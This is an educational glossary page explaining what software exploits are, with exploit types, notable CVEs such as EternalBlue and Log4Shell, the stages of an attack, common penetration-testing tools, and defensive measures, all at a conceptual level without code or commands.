Contents
Exploits: Weaknesses Weaponised
An exploit is a piece of code, technique, or tool used by attackers to take advantage of a vulnerability in a system. Exploits can target software, hardware, misconfigurations, or even social behaviours, and are often used to gain unauthorised access, escalate privileges, exfiltrate data, or disrupt operations.
💥 What Is an Exploit?
At its core, an exploit is the method used to trigger a vulnerability — it’s the practical weaponisation of a weakness. While vulnerabilities are the flaws, exploits are how those flaws are actively abused.
Types of vulnerabilities exploited include:
- Buffer overflows
- SQL injection flaws
- Cross-site scripting (XSS)
- Privilege escalation bugs
- Authentication bypasses
- Insecure deserialisation
🔍 Types of Exploits
| Type | Description |
|---|---|
| Remote Exploit | Launched over a network; attacker does not need physical access (e.g. RCE). |
| Local Exploit | Requires access to the system; used to escalate privileges. |
| Zero-Day Exploit | Targets a vulnerability not yet known to the vendor or public. |
| N-Day Exploit | Targets a known vulnerability that may not be patched in the target system. |
🧪 Examples of Real-World Exploits
- EternalBlue (CVE-2017-0144): Used by WannaCry ransomware to exploit SMBv1 on Windows.
- Log4Shell (CVE-2021-44228): Critical RCE in Log4j used to compromise Java applications.
- Shellshock (CVE-2014-6271): Bash bug allowing remote code execution on Unix systems.
- Heartbleed (CVE-2014-0160): Information leak from vulnerable OpenSSL versions.
⚙️ How Exploits Are Used
- Reconnaissance: Identify vulnerable targets.
- Weaponisation: Prepare a specific exploit payload.
- Delivery: Inject or deliver the payload (e.g. via phishing, HTTP, USB).
- Exploitation: Trigger the vulnerability.
- Installation/Persistence: Establish control (e.g. via a remote shell or malware).
🛠️ Common Exploitation Tools
- Metasploit Framework – A modular penetration testing toolkit.
- ExploitDB – Public archive of exploits and PoCs.
- Cobalt Strike – Advanced red team exploitation and post-exploitation toolkit.
- Nmap & NSE – Often used for detecting exploitable services.
🛡️ Defending Against Exploits
- Patch Management: Keep systems up to date with vendor patches.
- Vulnerability Management: Use tools like Qualys, Nessus, or OpenVAS to find and fix weaknesses.
- Intrusion Detection/Prevention Systems (IDS/IPS): Detect and block known exploit signatures.
- Web Application Firewalls (WAFs): Help prevent web-based exploitation attempts.
- Network Segmentation: Limit lateral movement opportunities after exploitation.
- Security Awareness: Reduce delivery vectors like phishing.